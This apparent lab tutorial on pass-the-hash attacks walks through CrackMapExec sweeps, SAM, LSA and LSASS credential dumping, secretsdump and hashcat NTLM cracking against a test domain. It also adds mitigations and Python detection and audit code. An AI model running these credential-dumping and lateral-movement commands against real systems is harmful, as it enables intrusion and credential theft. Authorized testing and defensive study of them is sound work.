Pass Attacks

Introduction

In cybersecurity, pass attacks exploit the authentication mechanisms of networked systems by presenting captured password hashes rather than plaintext passwords. These attacks enable lateral movement within a network, often bypassing conventional security controls.

Methodology

Step 1: Initial Setup with CrackMapExec

CrackMapExec is a powerful post-exploitation tool for enumerating and exploiting Active Directory (AD) environments. First, we ensure that CrackMapExec is functioning correctly by viewing the available options:

crackmapexec --help
[Screenshot: CrackMapExec]

Step 2: Running SMB Commands

To explore SMB (Server Message Block) shares and services, we can start by listing the help options specific to SMB:

crackmapexec smb --help
[Screenshot: CrackMapExec — SMB]

We then connect to the network, specifying the target subnet and credentials. In this phase, we successfully obtain the credentials of the Punisher and Spiderman machines, allowing access to additional resources and revealing valuable information about other accessible systems on the network.

sudo crackmapexec smb 192.168.92.0/24 -u fcastle -d MARVEL.local -p Password1

The command uses CrackMapExec to scan the 192.168.92.0/24 subnet for SMB services. It attempts to authenticate with the username fcastle and password Password1 on the domain MARVEL.local. If successful, it enumerates SMB shares and gathers information about the devices in the network. This is typically used for network reconnaissance and SMB vulnerability testing during penetration testing.

Step 3: Testing Authentication with Hashes

We use the -H option to leverage hash-based authentication, which specifies NTLM hash values instead of plain-text passwords. This technique is crucial in pass-the-hash attacks, where plaintext passwords are unnecessary.

sudo crackmapexec smb 192.168.92.0/24 -u administrator -H <hash> --local-auth
[Screenshot: CrackMapExec — Local-auth]

Step 4: Enumerating SAM Accounts and Shares

SAM (Security Account Manager) databases and shared folders are common targets in network environments. Enumerating them lets us view stored credentials and shared resources, providing insight into the network's structure.

SAM Enumeration

sudo crackmapexec smb 192.168.92.0/24 -u administrator -H <hash> --local-auth --sam
[Screenshot: CrackMapExec — local-auth — Sam]

Shared Folders Enumeration

sudo crackmapexec smb 192.168.92.0/24 -u administrator -H <hash> --local-auth --shares
[Screenshot: CrackMapExec — local-auth — Shares]

Step 5: Local Security Authority (LSA) Enumeration

The Local Security Authority (LSA) maintains various security policies and account information. Accessing it provides further credential-based access.

sudo crackmapexec smb 192.168.92.0/24 -u administrator -H <hash> --local-auth --lsa
[Screenshot: CrackMapExec — local-auth — lsa]

Step 6: Listing All Available SMB Shares

We use the -L option to enumerate SMB shares across the network. This step provides visibility into the shared resources accessible to the specified user, offering insight into sensitive data or high-privilege directories.

crackmapexec smb -L
[Screenshot: Listing all available SMB shares]

Step 7: Running LSASSY Module

Lsassy is an extraction tool that works alongside CrackMapExec to dump credentials from the Local Security Authority Subsystem Service (LSASS).

sudo crackmapexec smb 192.168.92.0/24 -u administrator -H <hash> --local-auth -M lsassy
[Screenshot: CrackMapExec — local-auth — lsassy]

Step 8: Database Enumeration and Switch to CMEDB

We switch to CMEDB, CrackMapExec's integrated database, to manage and review the data collected from enumerated hosts. It lets us view host details and the credentials and shares that were gathered.

  • Enter CMEDB

cmedb

  • Check hosts and shares from the cmedb prompt

hosts
shares
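The sweep above leaves a distinctive footprint on the targets: one source address completing NTLM network logons (Security event 4624, LogonType 3) as the same account against many hosts within minutes, and, with --local-auth, the same local account name on several different machines. The following detection logic is an added example, not part of the original post; the event records are constructed to mirror 4624 fields, and DC01, FILESRV and the source IPs are invented.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed 4624-style records, not real logs: (timestamp, target host, LogonType,
# AuthenticationPackageName, TargetUserName, TargetDomainName, IpAddress). DC01, FILESRV
# and the source IPs are made up; PUNISHER, SPIDERMAN and MARVEL come from the lab.
SAMPLE_EVENTS = [
    ("2024-05-01T10:00:01", "PUNISHER",  3, "NTLM", "fcastle", "MARVEL", "192.168.92.50"),
    ("2024-05-01T10:00:02", "SPIDERMAN", 3, "NTLM", "fcastle", "MARVEL", "192.168.92.50"),
    ("2024-05-01T10:00:02", "DC01",      3, "NTLM", "fcastle", "MARVEL", "192.168.92.50"),
    # --local-auth style logons: the local "administrator" account on each target
    ("2024-05-01T10:05:10", "PUNISHER",  3, "NTLM", "administrator", "PUNISHER",  "192.168.92.50"),
    ("2024-05-01T10:05:11", "SPIDERMAN", 3, "NTLM", "administrator", "SPIDERMAN", "192.168.92.50"),
    # benign noise: an interactive Kerberos logon and ordinary Kerberos share access
    ("2024-05-01T11:30:00", "PUNISHER",  2, "Kerberos", "fcastle", "MARVEL", "192.168.92.11"),
    ("2024-05-01T11:31:00", "FILESRV",   3, "Kerberos", "pparker", "MARVEL", "192.168.92.12"),
]

def parse(rec):
    ts, host, ltype, pkg, user, dom, src = rec
    return {"ts": datetime.fromisoformat(ts), "host": host.upper(), "logon_type": ltype,
            "pkg": pkg, "user": user.lower(), "domain": dom.upper(), "src": src}

def ntlm_fanout(events, window_sec=300, min_hosts=3):
    """Sources that completed NTLM network logons (LogonType 3) as one account to at
    least min_hosts distinct hosts within window_sec: the footprint of a -p or -H sweep."""
    window = timedelta(seconds=window_sec)
    by_key = defaultdict(list)
    for e in map(parse, events):
        if e["logon_type"] == 3 and e["pkg"] == "NTLM":
            by_key[(e["src"], e["user"])].append(e)
    hits = {}
    for key, evs in by_key.items():
        evs.sort(key=lambda e: e["ts"])
        for i, first in enumerate(evs):  # slide the window over each start event
            hosts = {e["host"] for e in evs[i:] if e["ts"] - first["ts"] <= window}
            if len(hosts) >= min_hosts:
                hits[key] = sorted(hosts)
                break
    return hits

def local_account_reuse(events, min_hosts=2):
    """One source using the same *local* account (TargetDomainName equals the target
    host name) on several hosts: what --local-auth leaves behind when local admin
    passwords are shared, the reuse the Mitigations section tells you to remove."""
    by_key = defaultdict(set)
    for e in map(parse, events):
        if e["logon_type"] == 3 and e["pkg"] == "NTLM" and e["domain"] == e["host"]:
            by_key[(e["src"], e["user"])].add(e["host"])
    return {k: sorted(v) for k, v in by_key.items() if len(v) >= min_hosts}
```

Feed it the 4624 events forwarded from all endpoints (not just the domain controller), because local-account logons are only recorded on the machine that accepted them.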

Dumping and Cracking Hashes with Secrets Dump

SecretsDump is utilized to retrieve hashed credentials from systems, providing direct access to SAM hashes.

  1. Dumping Hashes with Credentials

secretsdump.py MARVEL.local/fcastle:'Password1'@192.168.92.128
[Screenshot: SecretsDump — fcastle]

  2. Using Alternate Credentials

secretsdump.py MARVEL.local/pparker:'Password1'@192.168.92.137
[Screenshot: SecretsDump — pparker]

  3. Dumping Hashes with a Provided Hash

secretsdump.py administrator@192.168.92.128 -hashes <hash>

Cracking Retrieved Hashes with Hashcat

Once hashes are extracted, we crack them to recover the plaintext passwords. First we create a file to hold the hashes:

  • Create a Hash File

mousepad ntlm.txt

Then paste the copied hash into this file.

  • Verify NTLM Hash Format (this shows the Hashcat mode number for NTLM, 1000)

hashcat --help | grep NTLM

  • Crack Hashes with Hashcat

hashcat -m 1000 ntlm.txt rockyou.txt

  • hashcat: This is the tool used for high-performance password cracking. Hashcat supports various hashing algorithms and allows us to perform dictionary, brute-force, and hybrid attacks.

  • -m 1000: The -m option specifies the hashing algorithm. In this case, 1000 is the mode identifier for NTLM hashes. NTLM is a hash format used mainly by Windows operating systems to store password hashes. The mode 1000 tells Hashcat that the hashes in the file ntlm.txt are NTLM hashes and to use the appropriate algorithm.

  • ntlm.txt: This is the input file containing the NTLM hashes to be cracked.

  • rockyou.txt: This is the wordlist or dictionary file used by Hashcat to attempt cracking the hashes.

[Screenshot: Hash Cracked]

Mitigations

Pass the Hash / Pass the Password

While it is challenging to fully prevent pass attacks, several mitigations can significantly raise the difficulty for attackers:

  1. Limit Account Re-use

  o Unique Passwords for Each Local Administrator Account: Avoid re-using the same password across different local administrator accounts.

  o Disable Guest and Built-In Administrator Accounts: Disabling these accounts reduces attack entry points, as they are often default targets.

  o Apply the Principle of Least Privilege: Restrict local administrator rights to only essential personnel and systems to minimize the risk and impact of an account being compromised.

  2. Utilize Strong Passwords

  o Enforce Long and Complex Passwords: Require passwords longer than 14 characters with a mix of upper and lower case letters, numbers, and symbols. Stronger passwords increase the difficulty of successful brute force and pass-the-hash attacks.

  3. Multi-Factor Authentication (MFA)

  o Adding MFA, especially for privileged accounts, greatly enhances security by requiring additional verification steps beyond just the password or hash.

  4. Network Segmentation and Isolation

  o Separate High-Risk and Critical Systems: Segment the network so that high-value assets, such as domain controllers and critical servers, are isolated from other network zones. This restricts lateral movement if one account or machine is compromised.
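Mitigation 1 can be verified rather than assumed: the same secretsdump SAM output used above, collected from your own hosts during an authorized audit, shows directly whether the built-in Administrator hash is identical across machines and whether Guest still has an empty password. This parser and check are an added example, not from the original post; the dumps are constructed (the 1111/2222/3333 hashes are placeholders, FILESRV is an invented host), and only the empty-LM and empty-password NT hash values are real, well-known constants.

```python
import re
from collections import defaultdict

# secretsdump prints SAM entries as user:rid:lmhash:nthash:::. The dumps below are
# constructed: aad3b4... is the well-known empty LM hash, 31d6cf... the NT hash of an
# empty password, and the 1111/2222/3333 values are placeholders; FILESRV is made up.
SAM_DUMPS = {
    "PUNISHER": """[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
frank:1001:aad3b435b51404eeaad3b435b51404ee:22222222222222222222222222222222:::""",
    "SPIDERMAN": """[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::""",
    "FILESRV": """[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:33333333333333333333333333333333:::""",
}

SAM_LINE = re.compile(r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$")
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

def parse_sam(text):
    """Return {user: (rid, nt_hash)} from secretsdump SAM output; other lines are skipped."""
    out = {}
    for line in text.splitlines():
        m = SAM_LINE.match(line.strip())
        if m:
            out[m["user"]] = (int(m["rid"]), m["nt"].lower())
    return out

def shared_admin_hashes(dumps):
    """{nt_hash: sorted hosts} for RID-500 (built-in Administrator) hashes that appear on
    two or more hosts: the password reuse that lets one -H value open every machine."""
    by_hash = defaultdict(set)
    for host, text in dumps.items():
        for rid, nt in parse_sam(text).values():
            if rid == 500:
                by_hash[nt].add(host)
    return {nt: sorted(hosts) for nt, hosts in by_hash.items() if len(hosts) >= 2}

def empty_password_accounts(dumps):
    """[(host, user)] whose NT hash is the empty-password hash, e.g. a Guest account
    that should be disabled rather than left with no password."""
    return sorted((host, user) for host, text in dumps.items()
                  for user, (_, nt) in parse_sam(text).items() if nt == EMPTY_NT)
```

Matching on RID 500 rather than the name "Administrator" keeps the check working when the built-in account has been renamed.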
